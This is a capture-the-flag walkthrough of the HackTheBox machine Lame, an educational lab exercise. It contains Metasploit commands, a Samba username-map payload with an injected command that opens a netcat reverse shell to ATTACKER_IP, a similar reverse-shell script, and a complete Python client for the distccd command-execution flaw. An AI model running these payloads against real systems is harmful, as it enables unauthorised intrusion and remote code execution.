HTB Lame Writeup (Walkthrough)

Introduction

Lame was the first box released on HackTheBox, and it’s considered an excellent starting point for beginners. This machine demonstrates classic vulnerabilities in outdated services and provides a straightforward path to root access. In this writeup, I’ll walk through the enumeration process and present multiple methods to exploit this Linux machine.

Machine Overview

  • Name: Lame
  • IP Address: 10.10.10.3
  • Difficulty: Easy
  • OS: Linux
  • Points: 20

Initial Reconnaissance

Let’s begin with a comprehensive Nmap scan to identify open ports and available services.

# Nmap scan for all ports with service detection and default scripts
nmap -p- -sC -sV 10.10.10.3 -oA nmap/full-scan

Nmap Results

Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-22 14:30 EDT
Nmap scan report for 10.10.10.3
Host is up (0.023s latency).
Not shown: 65530 closed tcp ports (reset)

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

From the Nmap results, we can identify several potential attack vectors:

  1. FTP (port 21) - vsftpd 2.3.4 with anonymous login allowed
  2. SSH (port 22) - OpenSSH 4.7p1
  3. Samba (ports 139, 445) - Samba 3.0.20
  4. Distributed Compiler Daemon (port 3632) - distccd v1

Let’s explore each of these services for vulnerabilities.

Vulnerability Assessment

1. FTP Server (vsftpd 2.3.4)

vsftpd 2.3.4 is infamous for a backdoor that was not a bug in the program itself but a trojaned copy of the 2.3.4 source tarball planted on the project's download server in 2011. On a build made from that tarball, a login whose username contains ":)" makes the server open a root shell on TCP port 6200. Let's try it first.

# Connect to FTP anonymously
ftp 10.10.10.3

While anonymous login is allowed, there don’t appear to be any interesting files accessible. Let’s check if the vsftpd backdoor is exploitable:

# Using Metasploit to check for vsftpd backdoor
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.3
run

The module sends a USER value containing ":)" followed by a PASS, then looks for the backdoor's root shell on TCP port 6200. Unfortunately, the attempt fails here: nothing answers on port 6200, so either this build does not carry the backdoor or its listener is unreachable. Rather than guess, move on to the other services.

2. Samba Server (Samba 3.0.20)

Samba 3.0.20 is quite old and a likely target for public exploits. First, list the shares. Note that this server predates SMB2 entirely, while current smbclient builds (Samba 4.11 and later) disable SMB1 by default; if the listing fails with a connection error, add --option='client min protocol=NT1' to the command:

# Enumerate Samba shares (anonymous, no password)
smbclient -L //10.10.10.3 -N

Output:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

We found several shares. Let’s check if we can access them without credentials:

# Try to connect to the tmp share
smbclient //10.10.10.3/tmp -N

We can connect to the tmp share without authentication. Let’s search for vulnerabilities in this Samba version:

searchsploit samba 3.0.20

Output:

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map scrip| unix/remote/16320.rb
---------------------------------------------- ---------------------------------

This is CVE-2007-2447. When smb.conf sets the non-default `username map script` option, smbd passes the username from the SMB session-setup request to that script through /bin/sh without any escaping, and it does so before the password is checked. A username containing shell metacharacters such as backticks therefore executes commands as the smbd process, which runs as root, and no valid credentials are needed at all. We can exploit this with Metasploit or by hand.

3. Distributed Compiler Daemon (distccd)

The distccd service on port 3632 is the distributed C compiler daemon. Exposed to the network without access restrictions, it executes whatever "compiler" command line a client sends it (CVE-2004-2687), which makes it a second route to code execution. Let's check available exploits:

searchsploit distccd

Output:

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
DistCC Daemon - Command Execution (Metasploit)| multiple/remote/9915.rb
---------------------------------------------- ---------------------------------

Exploitation Methods

Method 1: Exploiting Samba with Metasploit

Let’s use Metasploit to exploit the username map script vulnerability in Samba:

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit

This module's default payload is a plain Unix command shell, not Meterpreter, so a successful run drops us straight into a shell session. Because smbd runs as root, the first command confirms we already have full control:

whoami
root

Method 2: Manual Exploitation of Samba

We can also trigger the bug by hand: any SMB1 client that lets us choose the username will do, because the payload rides in the session-setup username. Start a netcat listener on your machine first:

nc -lvnp 4444

Then connect with smbclient, forcing SMB1 (the server supports nothing newer) and supplying the payload as the username. Replace ATTACKER_IP with the address your listener is bound to:

smbclient //10.10.10.3/tmp -N --option='client min protocol=NT1' -U './=`nohup nc -e /bin/bash ATTACKER_IP 4444`'

smbd hands the username to the map script via /bin/sh, which evaluates the backticks; nohup keeps the reverse shell alive after the script exits. The smbclient session itself reports a login failure, which is expected, and the shell lands on the listener. If your smbclient build falls back to anonymous credentials despite -U, connect without -U and issue the same username from the smb: prompt with smbclient's logon command instead.

Method 3: Exploiting distccd Service

Another vector is through the distccd service:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS 10.10.10.3
exploit

This gives us a shell as the daemon user, the unprivileged account distccd runs under on this box, so a privilege escalation step is still needed to reach root.

Manual distccd Exploitation

We can also drive the distcc protocol ourselves with a small client script. The helper used below, distccd_exploit.py, is not reproduced in this post; it takes the target and a file whose contents it sends to distccd as the command to run. First write the command file for a reverse shell:

# First, create a file with the command to execute
echo '#!/bin/bash' > cmd.sh
echo 'nc -e /bin/bash ATTACKER_IP 5555' >> cmd.sh
chmod +x cmd.sh

# Then hand it to the helper, which speaks the distcc protocol to port 3632
./distccd_exploit.py 10.10.10.3 cmd.sh

With a netcat listener running on port 5555 (nc -lvnp 5555), we should receive a connection.
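Since the helper script is not on the page, here is a minimal distcc client that shows what any such script has to send. It is an added example written for this writeup, not the page's distccd_exploit.py and not the distcc project's code. distcc's protocol is a stream of 4-byte ASCII token names each followed by an 8-digit hex value; for ARGV, DOTI, SOUT, SERR and DOTO that value is a byte length and the payload follows. The daemon runs argv[0] as the compiler, so the job `sh -c '<cmd>' # -c main.c -o main.o` executes <cmd> through sh: the trailing words satisfy distccd's argument scan (it needs a -c, a source file and an output file to substitute temporary files for) and are only positional parameters as far as sh is concerned. The host, port and SAMPLE_RESPONSE are assumptions or constructed data.

```python
#!/usr/bin/env python3
"""Minimal distcc protocol client for the distccd command-execution bug
(CVE-2004-2687). Added example for this writeup; not the page's helper script.
"""
import socket

DISTCC_PORT = 3632
DATA_TOKENS = {b"ARGV", b"DOTI", b"SOUT", b"SERR", b"DOTO"}
# Constructed reply in the daemon's DONE/STAT/SERR/SOUT/DOTO shape, for offline checks only
SAMPLE_RESPONSE = (b"DONE00000001STAT00000000SERR00000000"
                   b"SOUT0000000euid=1(daemon)\n"
                   b"DOTO00000000")


def token(name: bytes, value: int, data: bytes = b"") -> bytes:
    """Encode one token: NAME + 8 hex digits + optional payload bytes."""
    return name + f"{value:08x}".encode() + data


def build_request(cmd: str) -> bytes:
    """A complete job: protocol version 1, argc, the argv tokens, then a one-byte
    DOTI 'preprocessed source' that distccd reads before it runs the compiler."""
    args = [b"sh", b"-c", cmd.encode(), b"#", b"-c", b"main.c", b"-o", b"main.o"]
    req = token(b"DIST", 1) + token(b"ARGC", len(args))
    for a in args:
        req += token(b"ARGV", len(a), a)
    return req + token(b"DOTI", 1, b"A")


def parse_response(buf: bytes) -> dict:
    """Decode the reply: STAT is the command's exit status, SOUT/SERR its captured
    stdout/stderr, DOTO the (here empty) object file. Length-bearing tokens map to
    bytes, the others to their integer value."""
    out, i = {}, 0
    while i + 12 <= len(buf):
        name, value = buf[i:i + 4], int(buf[i + 4:i + 12], 16)
        i += 12
        if name in DATA_TOKENS:
            out[name.decode()] = buf[i:i + value]
            i += value
        else:
            out[name.decode()] = value
    return out


def run_command(host: str, cmd: str, port: int = DISTCC_PORT, timeout: float = 10.0) -> dict:
    """Send one job and return the parsed reply. For a reverse shell, background the
    command (nc ... &) so distccd's compile step returns and the reply is sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        chunks = []
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    import sys
    reply = run_command(sys.argv[1], sys.argv[2])
    print(reply.get("SOUT", b"").decode(errors="replace"), end="")
    print(reply.get("SERR", b"").decode(errors="replace"), end="")
```

`python3 distcc_client.py 10.10.10.3 id` returns the daemon's captured stdout, which is how to confirm the context (the daemon user) before spending a reverse shell on it.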

Post-Exploitation

Once we have a shell as root, let’s collect our flags:

cat /home/makis/user.txt
cat /root/root.txt

Privilege Escalation (If needed from distccd exploit)

If we used the distccd exploit and got a shell as a non-root user, the usual local checks apply:

  1. Check the kernel version for public exploits:

    uname -a

  2. Look for SUID binaries:

    find / -perm -4000 -type f 2>/dev/null

  3. Check for writable files in /etc:

    find /etc -writable -type f 2>/dev/null

Given the box's age and its 2.6-series kernel, several public kernel exploits of that era grant root; the Samba path above is simply the shorter route.

Lessons Learned

  1. Keep services updated: All exploitable services on this box were outdated with known vulnerabilities.
  2. Disable unnecessary services: Running unnecessary services like vsftpd and distccd increases the attack surface.
  3. Configure services securely: Anonymous FTP access and unauthenticated Samba shares are security risks.
  4. Implement proper access controls: Critical vulnerabilities often stem from lacking authentication or authorization mechanisms.

Conclusion

Lame is an excellent machine for beginners to practice basic enumeration and exploitation techniques. Despite being the first box on HackTheBox, it still teaches valuable lessons about the importance of keeping systems updated and properly secured. The multiple vectors for exploitation also provide different learning opportunities and approaches to compromising a system.

Done!


This post is licensed under CC BY 4.0 by the author.